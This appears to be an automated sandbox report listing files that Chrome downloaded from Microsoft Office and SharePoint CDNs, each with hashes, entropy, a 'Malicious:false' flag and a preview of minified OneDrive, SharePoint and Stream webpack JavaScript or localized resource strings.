                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[181],{1822:(e,t,n)=>{n.r(t),n.d(t,{initializeIcons:()=>E});var a=n(456),i=n("fui.util_150");function r(e,t){void 0===e&&(e="");var n={style:{MozOsxFontSmoothing:"grayscale",WebkitFontSmoothing:"antialiased",fontStyle:"normal",fontWeight:"normal",speak:"none"},fontFace:{fontFamily:'"FabricMDL2Icons-0"',src:"url('".concat(e,"odsp-next-icons-0-433a26c6.woff') format('woff')")},icons:{DecreaseIndentLegacy:".",IncreaseIndentLegacy:".",SizeLegacy:".",PageLink:".",DatabaseSource:".",CommentSolid:".",ChangeEntitlements:".",Installation:".",WebAppBuilderModule:".",WebAppBuilderFragment:".",WebAppBuilderSlot:".",BullseyeTargetEdit:".",WebAppBuilderFragmentCreate:".",PageData:".",PageHeaderEdit:".",ProductList:".",UnpublishContent:".",DependencyAdd:".",DependencyRemove:".",EntitlementPolicy:".",EntitlementRedemption:".",SchoolDataSyncLogo:".",BugWarning:".",BugAction:".",S
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2147)
                              Category:downloaded
                              Size (bytes):2152
                              Entropy (8bit):5.30379199319876
                              Encrypted:false
                              SSDEEP:
                              MD5:D2440F1D488A582BB41FFE3F69D5AD5E
                              SHA1:0E02A3A27F6ADFD1FA408C4603351DEA318E139C
                              SHA-256:31E9E47242930660B9E90171E5E805FCC06F8B86220A2DE38A4EE7C207BEDF2F
                              SHA-512:686685FC2DFDB9CFAC7011911C317F367DB3166EE04420E5A6BC1625BB404F5826FFAF949D42D714868A8CA19EC43EA34D4BE0301D2433E49AFBC31213FF6C6B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/215.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[215],{1162:(e,t,n)=>{n.r(t),n.d(t,{formatIListSyncIssueAsISPListRow:()=>d,formatISPListRowAsIListSyncIssueAndItemKeys:()=>l,populateNucleusSyncIssuesView:()=>c});var a=n("tslib_102"),i=n(52),r=n(23),o=n(298),s=n(129);function c(e,t,n){return(0,a.Zd)(this,void 0,void 0,function(){var o,c,l,u,f,p,m,_,h,b,g,v;return(0,a.qr)(this,function(y){switch(y.label){case 0:return o=[],c={DefaultView:!1,Hidden:!1,Id:s.e,ServerRelativeUrl:"/syncIssues.aspx",Title:"Sync Issues",ViewType:r.c.standard,ListViewXml:'<View Name="{'+s.e+'}"></View>'},l="Name",u="Issue",f="Occurred",p={ID:s.d.Name,displayName:l,internalName:l,realFieldName:l,type:i.b.Text,width:130,isCalculated:!1,isReadOnly:!1,isEditable:!1,isSortable:!1},m={ID:s.d.Issue,displayName:u,internalName:u,realFieldName:u,type:i.b.Text,width:130,isCalculated:!1,isReadOnly:!1,isEditable:!1,isSortable:!1},_={ID:s.d.Occurred,displayName:f,internalName:f,realFieldName:f,type
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9938)
                              Category:downloaded
                              Size (bytes):16548
                              Entropy (8bit):5.367868202130946
                              Encrypted:false
                              SSDEEP:
                              MD5:02734DC95D6DB490DC882D0790E15C6A
                              SHA1:2141F21A3A6C09A3735105746300A400DFE26C66
                              SHA-256:81A1B2EC55A76E6E48513EDFAEB102311AF7D8129906898D75E20E14B6E9E84D
                              SHA-512:E0003E0F1911649B36184BF6940AAE6DF2FA16C873C8B0633E6C0F3C3E50082396874C056C6C623FB9FF2EA52007A2092166162F9F8E5BC1772C73E1FC876E6C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/216.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[216],{1124:(e,t,n)=>{n.d(t,{a:()=>d,b:()=>u});var a=n(30),i=n("odsp.util_578"),r=n(7),o=n(76),s=n(60),c={ODB:387},d="https://graph.microsoft.com",l="DisableGraph",u=function(){function e(e,t){this._pageContext=t.pageContext,this._sharingContextInformation=t.sharingContextInformation,this._oAuthTokenProvider=t.oAuthTokenProvider,this._sharingContextInformation&&this._sharingContextInformation.additionalTokens&&(this._graphToken=this._sharingContextInformation.additionalTokens.graphToken),this.initializeDataStore()}return e.prototype.canUseGraph=function(){if(this._graphToken)return!0;if(this._pageContext&&this._pageContext.authToken)return!1;var e=this._pageContext&&this._oAuthTokenProvider&&i.tH.isFeatureEnabled(c);return this._dataStore&&(e=e&&!this._dataStore.getValue(l,s.a.session)),e},e.prototype.disableGraphCallsForPicker=function(){this.initializeDataStore(),this._dataStore.setValue(l,!0,s.a.session)},e
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1351)
                              Category:downloaded
                              Size (bytes):1356
                              Entropy (8bit):5.328167404321876
                              Encrypted:false
                              SSDEEP:
                              MD5:CC1DE3E3C3941A5B0A58ED6821C1BB46
                              SHA1:3101AB580E432F95D7A9D7D5DFF66F3C897CF9AA
                              SHA-256:A5EA1B541988E52B89A391EE856366F44AB94F8B1B40326A357C44137C3AE836
                              SHA-512:D363080B9933878DC45D01F276BC970DB2EF186ACDD9670582505AFC7CE833CF6DF57C951084BFB2D971AC3E2961946C824C1526A97CF28CA61E09278AACBCD5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1020.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1020],{5401:function(e,t,n){n.r(t),n.d(t,{clearCroupByFieldKey:function(){return l}});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(52),o=n(2125),s=n(39),c=n(4610),d=n(2164),l=new i.qT({name:"ClearGroupByField.Key",factory:{dependencies:{navigation:r.a,listViewStore:o.a,refreshCurrentListDataAsync:d.a.async.lazy},create:function(e){var t=e.navigation,n=e.listViewStore,i=e.refreshCurrentListDataAsync;return{instance:function(e){var r,o;return(0,a.Zd)(this,void 0,void 0,function(){var d,l,u,f,p;return(0,a.qr)(this,function(m){switch(m.label){case 0:return(d=n.getCurrentView().getDomParts())&&d.groupBy&&(l=(0,c.c)(d.groupBy),(null===(r=l.group1)||void 0===r?void 0:r.fieldName)===e?void 0!==l.group2?n.updateGroupBy("clearCroupByFieldKey",{group1:(0,a.W_)({},l.group2)}):n.updateGroupBy("clearCroupByFieldKey",void 0):(null===(o=l.group2)||void 0===o?void 0:o.fieldName)===e&&n.updateGroupBy("clearCroupByFieldKey",{g
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2735)
                              Category:downloaded
                              Size (bytes):3123
                              Entropy (8bit):5.101404203200143
                              Encrypted:false
                              SSDEEP:
                              MD5:068C5184482AF6179DAFC02443667A73
                              SHA1:A26B074E276914469B850875C28D0BD3F0D29550
                              SHA-256:512483DC91F4B2AD903B2C676AA4C64A6C138C547868E4C0E64B6ED5EA093E58
                              SHA-512:9BDEFEB847F85A5E11867A20AC3FDA38E3ECA221DD2DC98A41EE7CAF4D4F78AA6F728C8F688C07865379F3DFC8E37AC484EBCD28D50475B97795CE0BC3AED177
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/53.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[53],{878:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>d,c:()=>c});var a=n(53),i=n(289),r=n(760),o=n(761),s={idParamKey:a.b,parentIdParamKey:o.a,driveIdParamKey:"driveId",driveEndpointParamKey:"endpoint",queryTypeParamKey:"view",pageParamKey:"p",parentQueryTypeParamKey:"parentview",windowNameJsonKey:"ODBParams",queryParamKey:a.h,conversationIdParamKey:"cvid",metadataSearchIdKey:a.f,uniqueParamKey:"u",navParamKey:"nav",localeKey:"locale",dateFilterKey:"dateFilter",typeFiltersKey:a.j,userFiltersKey:"userFilters",viewIdKey:a.k,viewPathKey:a.l,isPowerAppView:"isPowerAppView",listIdKey:a.d,listUrlKey:a.e,sortFieldKey:a.i,isAscendingKey:a.c,policyTipKey:"policyTipForListItemId",sharingKey:"sharingDialogForListItemId",openShare:"openShare",managePermissionsKey:"managePermissionsForListItemId",pseudoPolicyTipKey:"showpolicytips",groupByKey:a.a,errorTypeKey:"type",correlationIdKey:"correlation",approvalItemVersion:"approvalItemVersi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):98588
                              Entropy (8bit):5.333611984637065
                              Encrypted:false
                              SSDEEP:
                              MD5:E8FA177CF67DFA5D00C95DEE4EF34C93
                              SHA1:D418BB6288634AFAF34B2F6C598077351B08A7AA
                              SHA-256:69C6C54A4FCAC3203C29FE3A09BE1C9255A65570D89BE03A5F5427F15E7DF0CE
                              SHA-512:605C63AD86FD48F52B123DFC7C81D5D8EA3B9573300CFFD3781602441987F1B89BC2C54AA376AF49269E9FB9989D5D4B67B58D60FC4959AB13249A561C9A20DB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/shakaengine.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[11763],{461226:(e,t,n)=>{n.r(t),n.d(t,{ShakaOnePlayerEngine:()=>tt,fetchProtectionKey:()=>N,getHlsSegmentInfoRegistry:()=>at,parseContentProtectionData:()=>z});var a=n(295610),i=n(672115),r=n(82999),o=n(538054),s=n(262708),c=n(531344),d=n(243044),l=n.n(d),u=void 0,f={error:function(e,t,n){console.error("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))},info:function(e,t,n){console.info("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))},warn:function(e,t,n){console.warn("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))},debug:function(e,t,n){console.debug("[".concat(e,"]: ").concat(t," - ").concat(null!=n?n:""))}},p=function(e){var t;return null!==(t=null==u?void 0:u(e))&&void 0!==t?t:f},m=p("utils");function _(e,t){if(void 0===t&&(t="int"),void 0===e||"number"==typeof e)return e;if("string"==typeof e)switch(t){case"int":return parseInt(e,10)||void 0;case"float":return
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (14939)
                              Category:downloaded
                              Size (bytes):69797
                              Entropy (8bit):5.8044830428453995
                              Encrypted:false
                              SSDEEP:
                              MD5:037412B04300B7E216A98BCE72CFA8D6
                              SHA1:E79D3DA1B20E1F09A06DC7212E3CE06DF558395C
                              SHA-256:EB3E5610692234BEE187C3EACB376B4877CF8DF0D331FACDDABF52968D51A642
                              SHA-512:1596F8AFD4BB663DD616F1204D246C3D5554EBB8366CA44E32C820A89C2B0F8A0A53E9AC8758A4D5247894D215412C3222C1136798F9823F5EF5FCB88E5910CE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/ja/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{586:e=>{e.exports=JSON.parse('{"a":".........","c":"..............","b":"............................."}')}.,1612:e=>{e.exports=JSON.parse('{"a":"..... ......."}')}.,696:e=>{e.exports=JSON.parse('{"b":"[.......] ............","d":"OneDrive ............","n":"..","p":".....................","y":".........","a":".. .........................","o":".. ..........................","c":"OneDrive ......................","m":".....................","f":"..
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2310)
                              Category:downloaded
                              Size (bytes):2332
                              Entropy (8bit):4.829571172650956
                              Encrypted:false
                              SSDEEP:
                              MD5:CA7C7BA2649DAE53BB4A01475B52A4F2
                              SHA1:4234EA9DE60BD2D899FD46A8B7BF0305F703B2B2
                              SHA-256:30A1DD5F2115874A6C16E10B2D7D18D77D454DB163FDCC69826D53A49A70E31E
                              SHA-512:68F87D8CAF19265DB0839AF59D4F623C0EA22A4197E026DAE99737B9A30BA1C7DD0EB765DF933F5C9500AA071D8ECE8ED7E88AD775A25EC7EE93053C26421972
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/de/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{7763:e=>{e.exports=JSON.parse('{"introPageHeaderText":"Microsoft Teams hinzuf.gen","selectPageHeaderText":"Ressourcen als Registerkarten in Teams anheften","introPageDescription1":"Bringen Sie Ressourcen von dieser Website in Teams ein, um in Echtzeit an einem Ort zusammenzuarbeiten. ","introPageSecondHeader":"Teams vereinfacht Folgendes:","introPagePoint1":"Mit Kollegen chatten","introPagePoint2":"Onlinebesprechungen mit Partnern koordinieren","introPagePoint3":"Gemeinsam an freigegebenen Inhalten arbeiten","selectPageDescription":"F.gen Sie Seiten, Listen und Dokumentbibliotheken als Registerkarten in Teams hinzu, um freigegebene Ressourcen f.r Mitarbeiter leicht zug.nglich zu machen. Sobald sie sich in Teams befinden, k.nnen Ressourcen in Registerkarten hinzugef.gt, entfernt oder neu geordnet werden.","continueButtonText":"Weiter","addTeamButtonText":"Teams hinzuf.gen","cancelButto
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (18375)
                              Category:downloaded
                              Size (bytes):411716
                              Entropy (8bit):5.420080357121025
                              Encrypted:false
                              SSDEEP:
                              MD5:782DD033CF75041253BD3542270A2486
                              SHA1:93DBAF55F3DF7BE5B9A02C97DDE2830922DD7B44
                              SHA-256:31C19A2AC2A1EEA85843ACDBFC812038066AB503B91EBED795F8F8C596BF846F
                              SHA-512:B83D0FF3A030C5D69A1D2620DD1591442A7D56BE99546FA7FED1D5F49B7F5EA7D63FC2458DB4582D2C613F8FF9173AA4305EFF5831968DA3509F12F05DD11143
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-12.003/spserviceworker.js
                              Preview:/*! For license information please see spserviceworker.js.LICENSE.txt */.(()=>{var e=[(e,t,n)=>{"use strict";n.d(t,{a:()=>a,b:()=>o,c:()=>s,d:()=>i,e:()=>r,f:()=>c});const a=self.location.protocol+"//"+self.location.host,i=new URL(self.location.href),r=i.searchParams.get("userId"),o={NavigationPreload:"Service-Worker-Navigation-Preload",ApplicationId:"X-Service-Worker-Application-Id",InPlaceNav:"X-Service-Worker-In-Place-Nav",NavPrefetch:"X-RequestPrefetchLink",LkgPrefetch:"X-RequestPrefetchData",FromServiceWorker:"X-From-Service-Worker"},s="/_api/sw-loopback/",c={active:!1}}.,(e,t,n)=>{"use strict";n.d(t,{a:()=>r,b:()=>s,c:()=>i,d:()=>c,e:()=>o,f:()=>d});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5206)
                              Category:downloaded
                              Size (bytes):13915
                              Entropy (8bit):5.4577226722215775
                              Encrypted:false
                              SSDEEP:
                              MD5:FCCB042428F6BBFFCE9EB70FC7C15D8F
                              SHA1:651876876815294172086EA013A5ABDCADE27BB7
                              SHA-256:12DE1226A10049C20D9D27036FB19DC372033837F41D037D7D311ED72AB98C8F
                              SHA-512:5CC1F987A459051E4543643D1DC834D1308CC6286A0F4C6917BDD1068F0ABA75C46806E8F45A1D4744703F26E0DA22CF01AB6D24E70E3AEA133FB593EF152FD9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/766.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[766,1023],{2507:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return i},c:function(){return o}});var a=n(6080),i={NONE:0,COUNT:1,AVG:2,MAX:3,MIN:4,SUM:5,STDEV:6,VAR:7},r=["NONE","COUNT","AVG","MAX","MIN","SUM","STDEV","VAR"];function o(e){return e=e?e.toUpperCase():e,a[e]||""}}.,2401:function(e,t,n){n.d(t,{a:function(){return r}});var a=n(1507),i=n("odsp.util_578").HW.isActivated("3b19f82c-5b72-426e-902b-6a609767e0b2","01/08/2024","Default URL field to hyperlink format instead of image format");function r(e){var t=e.FieldType;if("Calculated"===t&&(t=e.ResultType),"Computed"===t)switch(e.Name){case"FileSizeDisplay":return a.a.FileSize;case"ImageSize":return a.a.ImageSize;case"SharedWith":return a.a.SharedWith;case"_IsRecord":return a.a.ComplianceRecordFlag;case"ThumbnailOnForm":case"Thumbnail":return a.a.Thumbnail;default:return a.a.Computed}var n=a.a[t];if("number"==typeof n)return n;switch(t){ca
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                              Category:downloaded
                              Size (bytes):7886
                              Entropy (8bit):3.1280056112498884
                              Encrypted:false
                              SSDEEP:
                              MD5:604ADFB53677B5CA4F910FFB131B3E7C
                              SHA1:5F1A0FB4E4AD3707E591CE16352158263488ED70
                              SHA-256:24638331466A52BB66F912090E7A9CC9E3DF2236E39C187C9409104526B472B0
                              SHA-512:35F618F42ADFEE6D1335C67F729C298789419FE2930371A91683F60481794488DFAF15B572E6FC1BE70833EF12DFE57432725F6336B6B73DCFB52596F57F30A5
                              Malicious:false
                              Reputation:unknown
                              URL:https://netorgft3648903-my.sharepoint.com/_layouts/15/images/odbfavicon.ico?rev=47
                              Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(`.(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(p.....................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11368)
                              Category:downloaded
                              Size (bytes):32509
                              Entropy (8bit):5.474052424759364
                              Encrypted:false
                              SSDEEP:
                              MD5:E98AF5EB7E43C80DF46C1FEC4D3AE5FF
                              SHA1:5CAC42ABBFDAFCCF55EB521E6A01076AF6B89C8A
                              SHA-256:921DA24F04ACE6F22F2C9596D311B7D027B20C298A6CBF2F2ACEB2A024478C76
                              SHA-512:A9AF2F9FEDBAC5708CE209F9D449AAF2E23746C68E5793639DD1AC3E793554D66AF8C1DE68F1DE07C325DCF3C77B5EB092FFD8C6BB00C902BE59B5AF0716C0A6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/63261.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[63261],{192513:(e,t,n)=>{n.d(t,{l:()=>i});var a=n(243430);function i(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];for(var i=[],r=0,o=t;r<o.length;r++){var s=o[r];s&&i.push("function"==typeof s?s(e):s)}return 1===i.length?i[0]:i.length?a.m.apply(void 0,i):{}}}.,403849:(e,t,n)=>{n.d(t,{j:()=>o});var a=n(154591),i=n(200408),r=n(423374);function o(e){var t=i.Y.getInstance(),n=(0,r.aH)((0,a.Lo)(),e);if(!t.classNameFromKey(n)){var o=t.getClassName();t.insertRule("@font-face{".concat(n,"}"),!0),t.cacheClassName(o,n,[],["font-face",n])}}}.,100234:(e,t,n)=>{n.d(t,{F:()=>o});var a=n(154591),i=n(200408),r=n(423374);function o(e){var t=i.Y.getInstance(),n=[];for(var o in e)e.hasOwnProperty(o)&&n.push(o,"{",(0,r.aH)((0,a.Lo)(),e[o]),"}");var s=n.join(""),c=t.classNameFromKey(s);if(c)return c;var d=t.getClassName();return t.insertRule("@keyframes ".concat(d,"{").concat(s,"}"),!0),t.cache
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (17478)
                              Category:downloaded
                              Size (bytes):20387
                              Entropy (8bit):5.430212097916674
                              Encrypted:false
                              SSDEEP:
                              MD5:7034941C588CEB65F39ED03B817C9025
                              SHA1:5C2739D203408601204EEA53F97F5F2D00216798
                              SHA-256:9225B0FF4A062DA01079EF737FCB97471A29AB96081C28B3594CB3B04DCF598D
                              SHA-512:09D897EE724E00FED9CCED4EE14A663706F42CF8348803A3EC0467A167B4E4470BC848CEA08D666D292D19A2682C4CD229E03C2F0F1B21BD028588425AA191B5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/6.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[6],{3046:function(e,t,n){var a,i,r;n.d(t,{a:function(){return a},b:function(){return i},c:function(){return r}}),function(e){e[e.regularUser=0]="regularUser",e[e.externalUser=1]="externalUser",e[e.group=2]="group",e[e.application=3]="application",e[e.linkedinUser=4]="linkedinUser"}(a||(a={})),function(e){e.graph="graph",e.sharepointSearch="sharepointSearch",e.substrate="substrate"}(i||(i={})),function(e){e.unified="unifiedGroup",e.securityGroup="securityGroup",e.SPGroup="SPGroup",e.PublicDistributionList="PublicDistributionList",e.family="family"}(r||(r={}))}.,6194:function(e,t,n){n.d(t,{a:function(){return x}});var a=n("tslib_102"),i=n(3046),r=n(174),o=n("odsp.util_578"),s=n(92),c=n(1333),d=n(2212),l=n(23),u=n(2195),f=n(402),p=n(219),m=n(1477),_=n(1334),h=n(1336),b=n(6195),g=n(48),v=n(14),y=!o.HW.isActivated("b7426b02-fdf6-4c5e-9809-e0c21db41db7","07/10/2022","remove hard code graph endpoint and read from sp
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (59425)
                              Category:downloaded
                              Size (bytes):64758
                              Entropy (8bit):5.273247792783403
                              Encrypted:false
                              SSDEEP:
                              MD5:FA3B663DF4BA8A04E3C9336B821CA9EE
                              SHA1:8D5907B8A6707FD9090F90A2E672353D5B0E70CE
                              SHA-256:5357300D4AD4B3A6B35A62AA4943A22F4B36087A0DDFC8270C9DE677D911CF6C
                              SHA-512:B4EE5133293549B6F14B22FA0CE2089E8CAC9DA29DF7E26E701D26529728BCAAB0D4F7188D98ECD5204EF2ED96985A7105C3B4DD2E9CAD298F672E2A3B9A88D2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.knockout/odsp.knockout.lib-848c845f.js
                              Preview:/*! For license information please see odsp.knockout.lib-848c845f.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.knockout.lib"],{"knockout-projections-lib":function(e,t,n){var a,i,r;!function(o){"use strict";function s(e,t,n,a,i,r,o){this.inputItem=t,this.stateArrayIndex=n,this.mappingOptions=i,this.arrayOfState=r,this.outputObservableArray=o,this.outputArray=this.outputObservableArray.peek(),this.isIncluded=null,this.suppressNotification=!1,this.outputArrayIndex=e.observable(a),this.disposeFuncFromMostRecentMapping=null,this.mappedValueComputed=e.computed(this.mappingEvaluator,this),this.mappedValueComputed.subscribe(this.onMappingResultChanged,this),this.previousMappedValue=this.mappedValueComputed.peek()}function c(e,t){if(!e)return null;switch(e.status){case"added":return e.index;case"deleted":return e.index+t;default:throw new Error("Unknown diff status: "+e.status)}}function d(e,t,n,a,i,r,o,c,d){var l="number"==typeof t.moved,u=l?n[t.move
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (10101)
                              Category:downloaded
                              Size (bytes):12941
                              Entropy (8bit):4.961042167643064
                              Encrypted:false
                              SSDEEP:
                              MD5:4AD5B413278D0A8E2221198437AB0A68
                              SHA1:D70767384BFD4B3F554B8D483C1EC6E8960CCB26
                              SHA-256:BC2BDC681D853FB2AD3133D9EA2C9F9655A511A21ECB2CB473B80F5918AA0BE9
                              SHA-512:883057B68BD192F238B530869F2C763034440770D643A3BD0EC5A3A95F254023B5155D45B5554A1F55A96781E397ADC066987F9E4C6E6616BE51A8325E6790D4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/38661.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[38661],{157285:(e,t,n)=>{n.d(t,{d:()=>o});var a=n(427445),i=n(639849);function r(e,t,n,a){void 0===a&&(a=!1);var r=0;if("string"==typeof e){var o=n.numberDigitSeperator||",",s=e.replace(new RegExp("\\".concat(o),"g"),"");r=Number(s)}else"number"==typeof e&&(r=e);return r<0&&!a&&(r=0),1===r?(0,i.U)(t.Singular,e.toString()):(0,i.U)(t.Plural,e.toString())}function o(e,t){if(!e)return"";var n=[t.Second,t.Minute,t.Hour,t.Day,t.Month,t.Year],i=e.split(t.Separator);if(i.some(function(e){return isNaN(+e)}))return"";for(var o="",s=0,c=i.length-1;s<i.length&&c>=0;s++,c--){var d=parseInt(i[s],10);(0===s||d>0)&&(o+="".concat(d," ").concat(r(d,n[c],(0,a.u)())))," "!==o.charAt(o.length-1)&&(o+=" ")}return o.trim()}}.,427445:(e,t,n)=>{n.d(t,{u:()=>o});var a={"af-za":{d:"YYYY-MM-DD",ns:"."},"am-et":{d:"DD/MM/YYYY"},"ar-ae":{d:"DD/MM/YYYY",t:"hh:mm tt"},"ar-bh":{d:"DD/MM/YYYY",t:"hh:mm tt"},"ar-dz":{d:"DD-M
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1935)
                              Category:downloaded
                              Size (bytes):1940
                              Entropy (8bit):5.255959043807471
                              Encrypted:false
                              SSDEEP:
                              MD5:712F61385E8C8F4DBB7816BA8A14497D
                              SHA1:795A02D9812CC273C9D4A0AB439FD4D5A978060D
                              SHA-256:4C1CE8AE9F79DC4225BD48CA725FEAA99AD373808072419459E348AD88FF7884
                              SHA-512:291C7E6A5460F790050EB8C1879AC5E8EE83F4978DC73E9CFFA239ED036E14FA2B4FBFE0AF9BEC5419E01C3D7829EAADD4B5BE42D6099985DAEF7C3397F12569
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/220.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[220],{1825:(e,t,n)=>{n.r(t),n.d(t,{oneDriveDataSourceKey:()=>f});var a=n("odsp.util_578"),i=n("tslib_102"),r=n(98),o=n(2063),s=n(61),c=n(2345),d=n(38);const l=function(){function e(e,t){var n=t.pageContext,a=t.tokenProvider;this._dataRequestor=new r.b({qosName:"OneDriveDataSource"},{pageContext:n,tokenProvider:a}),this._pageContext=n,this._personalUrl=void 0}return e.prototype._getPersonalUrlPayload=function(e){return{webAbsoluteUrl:e,url:new o.b({webAbsoluteUrl:e}).build().segments("SP.Directory.DirectorySession","me").rawParameter("$select=mySite").toString(),qosName:"FavoriteLists.GetMysiteUrl",noRedirect:!0,method:"POST"}},e.prototype.getPersonalUrl=function(){var e;return(0,i.Zd)(this,void 0,void 0,function(){var t,n,r;return(0,i.qr)(this,function(i){switch(i.label){case 0:return i.trys.push([0,4,,5]),void 0!==this._personalUrl?[3,3]:this.isCurrentOneDrive()?(this._personalUrl=this._pageContext.webAbsolu
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (22055)
                              Category:downloaded
                              Size (bytes):74554
                              Entropy (8bit):5.115602148317295
                              Encrypted:false
                              SSDEEP:
                              MD5:03BF8F75FD138352B59D9D15BDCFE1C2
                              SHA1:0D5BF40BDBA49EE32466FC0DD1060D0981628EC5
                              SHA-256:7071EF4FEC042CACED62A819A09AC39103AC93CDD8DA30ADE8D092ADA36553DC
                              SHA-512:EDEFDD114D117E0E6E0848987F2BA149E41236A2D814B67AEBD4999BBF389578756760CF62277A08430B5D2880FA9B56304AED6C38B86B50B94EEADF4744BFBD
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/fr/initial.resx.js
